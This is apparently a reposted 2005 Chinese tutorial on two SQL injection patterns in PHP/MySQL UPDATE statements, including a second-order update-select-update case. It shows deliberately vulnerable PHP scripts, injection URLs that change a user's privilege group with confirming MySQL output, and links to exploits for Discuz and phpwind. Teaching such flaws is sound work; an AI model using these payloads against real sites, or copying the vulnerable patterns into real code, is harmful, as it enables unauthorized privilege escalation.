UPDATE注射(mysql+php)的两个模式

所属分类: 实用技巧 / 漏洞研究 阅读数: 646
收藏 0 赞 0 分享
UPDATE注射(mysql+php)的两个模式 
                             文/安全天使·SuperHei 2005.8.11 
一.测试环境: 
OS: Windowsxp sp2 
php: php 4.3.10 ( 
mysql 4.1.9 
apache 1.3.33  

二.测试数据库结构: 
-----start--- 
-- 数据库: `test` 
--  

-- -------------------------------------------------------- 

--  
-- 表的结构 `userinfo` 
--  

CREATE TABLE `userinfo` ( 
  `groudid` varchar(12) NOT NULL default '1', 
  `user` varchar(12) NOT NULL default 'heige', 
  `pass` varchar(122) NOT NULL default '123456' 
) ENGINE=MyISAM DEFAULT CHARSET=latin1; 

--  
-- 导出表中的数据 `userinfo` 
--  

INSERT INTO `userinfo` VALUES ('2', 'heige', '123456'); 
------end------- 

三.测试模式: 
1,变量没有带''或""[MOD1] 

<?php 
//test1.php Mod1 
$servername = "localhost"; 
$dbusername = "root"; 
$dbpassword = ""; 
$dbname = "test"; 

mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败"); 

$sql = "update userinfo set pass=$p where user='heige'";//<--$P没有使用单引号 

$result = mysql_db_query($dbname, $sql); 
$userinfo = mysql_fetch_array($result); 

echo "<p>SQL Query:$sql<p>"; 
?> 

脚本里只是修改user='heige'的pass,如果groudid表示用户的权限等级,我们的目的就是通过构造$p 来达 
到修改groupid的目的: 

那么我们提交:http://127.0.0.1/test1.php?p=123456,groudid=1 

在mysql里查询: 
mysql> select * from userinfo; 
+---------+-------+--------+ 
| groudid | user  | pass   | 
+---------+-------+--------+ 
| 1       | heige | 123456 | 
+---------+-------+--------+ 
1 row in set (0.01 sec) 

用户heige的groudid又2改为1了 :) 

所以我们可以得到没有''或"" update的注射是可以成功的,这个就是我们的模式1。 

2,变量带''或""[MOD2] 

<?php 
//test2.php 
$servername = "localhost"; 
$dbusername = "root"; 
$dbpassword = ""; 
$dbname = "test"; 

mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败"); 

$sql = "update userinfo set pass='$p' where user='heige'";//<--$P使用单引号 

$result = mysql_db_query($dbname, $sql); 
$userinfo = mysql_fetch_array($result); 

echo "<p>SQL Query:$sql<p>"; 
?> 

为了关闭'我们构造$p应该为123456',groudid='2 提交: 
http://127.0.0.1/test2.php?p=123456',groudid='1 在gpc=on的情况下'变成了\' 
提交的语句变成:SQL Query:update userinfo set pass='123456\',groudid=\'1' where user='heige' 

mysql查询: 
mysql> select * from userinfo; 
+---------+-------+--------------------+ 
| groudid | user  | pass               | 
+---------+-------+--------------------+ 
| 2       | heige | 123456',groudid='1 | 
+---------+-------+--------------------+ 
1 row in set (0.00 sec) 

groudid并没有被修改。那么在变量被''或""时 就完全没有被注射呢?不是 下面我们看模式2: 

<?php 
//test3.php Mod2 
$servername = "localhost"; 
$dbusername = "root"; 
$dbpassword = ""; 
$dbname = "test"; 

mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败"); 

$sql = "update userinfo set pass='$p' where user='heige'";//<--$P使用单引号 

$result = mysql_db_query($dbname, $sql); 
mysql_fetch_array($result);    //$p的数据写入数据库 

$sql= "select pass from userinfo where user='heige'";  
$result = mysql_db_query($dbname, $sql); 
$userinfo=mysql_fetch_array($result);  

echo $userinfo[0];  //把pass查询输出给$userinfo[0] 

$sql ="update userinfo set pass='$userinfo[0]' where user='heige'"; 
$result = mysql_db_query($dbname, $sql); 
mysql_fetch_array($result); //把$userinfo[0] 再次update 

?> 

我们测试下,提交:http://127.0.0.1/test3.php?p=123456',groudid='1 
回mysql查询下 : 
mysql> select * from userinfo; 
+---------+-------+--------+ 
| groudid | user  | pass   | 
+---------+-------+--------+ 
| 1       | heige | 123456 | 
+---------+-------+--------+ 
1 row in set (0.00 sec) 

HaHa~~ 成功注射 修改groudid为1。 这个就是我们的模式2了,简单的描叙如下: 

update-->select-->update 

四.实际模式 
模式1:Discuz 2.0/2.2 register.php 注射  
       漏洞分析:http://4ngel.net/article/41.htm 
       Discuz 2.0/2.2 register.php Remote Exploit :http://4ngel.net/project/discuz_reg.htm 
模式2:phpwind 2.0.2和3.31e 权限提升漏洞  
       漏洞分析: 
           update (profile.php 注射变量为$proicon update语句里为,icon='$userdb[icon]') 

              v 
           select (jop.php) 

              v 
           updtate (jop.php) 

       Exploit:http://www.huij.net/9xiao/up/phpwind-exploit.exe  

五.鸣谢 
   特别感谢saiy等朋友的讨论和帮助。Thanks!!!  
更多精彩内容其他人还在看

MySQL Proxy(解决注入的另一思路)

MySQL Proxy的主要作用是用来做负载均衡,数据库读写分离的。但是需要注意的是,MySQL Proxy还有个强大的扩展功能就是支持Lua语言——魔兽也是使用了Lua来开发游戏,据我所知网易也是——可以参见云风的博客。
收藏 0 赞 0 分享

phpwind管理权限泄露漏洞利用程序发布

phpwind是国内使用非常广泛的一款程序,由于在程序设计上存在错误,导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作
收藏 0 赞 0 分享

分析NtGodMode.exe干了什么

NtGodMode.exe是通过打开LSASS.EXE进程msv1_0.dll模块空间里,然后搜索特征值8B 4D 0C 49之后第1个32 C0 这个32C0汇编码xor al,al,修改为B001对应汇编码mov al,1 为什么mov al,1,以后就不用密码了?
收藏 0 赞 0 分享

伯乐asp收信程序漏洞及利用程序利用代码

信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 文章作者:fhod 发这个也是因为看了asm所写的新概念收信程序 箱子永远不会被黑
收藏 0 赞 0 分享

字符集导致的浏览器跨站脚本攻击分析

前言:这种利用类型的攻击早在06年就被安全研究人员指出,不过一直没有在国内重视。而由于我们国内大部分站点正是这种有漏洞的字符集,所以影响还是比较大,希望各大站快速修复。可以看看http://applesoup.googlepages.com/。
收藏 0 赞 0 分享

Search Engine XSS Worm

作者:余弦 来源:0x37 Security 有挑战才有意思,为了诞生个Search Engine XSS Worm,这里拿yeeyan做实验了。
收藏 0 赞 0 分享

CPU也有远程攻击漏洞 英特尔匆匆修补

BEAREYES.COM 北京 [ 翻译 ] 作者:1000years 日期:2008年08月12日
收藏 0 赞 0 分享

暂时屏蔽 IE 最新 0day的4 种方法

IE 最新 0day 波及了微软全线系统居然在2008年12月14日8:00:15还没有出补丁!我查看微软站点,好像有几个手动操作的办法暂时屏蔽。
收藏 0 赞 0 分享

Sql Server 应用程序的高级Sql注入第1/2页

这篇文章讨论常用的"sql注入"技术的细节,应用于流行的Ms IIS/ASP/SQL-Server平台。这里探讨有关这种攻击各种可以注入程序访问数据和数据库防范的方法。
收藏 0 赞 0 分享

ASP木马后门新思路

ASP木马后门新思路
收藏 0 赞 0 分享
查看更多